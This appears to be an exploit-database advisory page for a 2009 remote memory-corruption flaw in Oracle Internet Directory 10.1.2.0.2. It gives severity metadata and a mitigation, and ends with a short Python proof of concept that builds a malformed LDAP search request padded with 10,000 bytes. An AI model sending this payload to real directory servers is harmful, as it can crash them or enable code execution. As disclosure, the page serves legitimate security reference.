Oracle Internet Directory Remote Memory-Corruption Vulnerability

vendor:

Oracle Internet Directory

by:

SecurityFocus

7.5

CVSS

HIGH

Remote Memory-Corruption

119

CWE

Product Name: Oracle Internet Directory

Affected Version From: 10.1.2.0.2

Affected Version To: 10.1.2.0.2

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Oracle Internet Directory Remote Memory-Corruption Vulnerability

Oracle Internet Directory is prone to a remote memory-corruption vulnerability. Exploits may allow attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in denial-of-service conditions.

Mitigation:

Upgrade to the latest version of Oracle Internet Directory.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37833/info

Oracle Internet Directory is prone to a remote memory-corruption vulnerability.

Exploits may allow attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in denial-of-service conditions.

Oracle Internet Directory 10.1.2.0.2 is vulnerable; other versions may also be affected.

NOTE: This issue may be a duplicate of an existing BID and may have already been addressed by the vendor. We will update the BID if more information emerges.

s ="\x30\x82\x27\x4a\x02\x01\x01\x63\x82\x27\x43\x04\x00\x0a\x01\x02"
s+="\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\xa4\x82\x27\x2e"
s+="\x04\x04\x6d\x61\x69\x6c\x30\x82\x27\x24\x80\x04\x66\x6f\x6f\x40"
s+="\x81\x04\x75\x6e\x69\x76"
s+="\x82"*10000
s+="\x82\x06\x6d\x75\x6e\x69\x63\x68"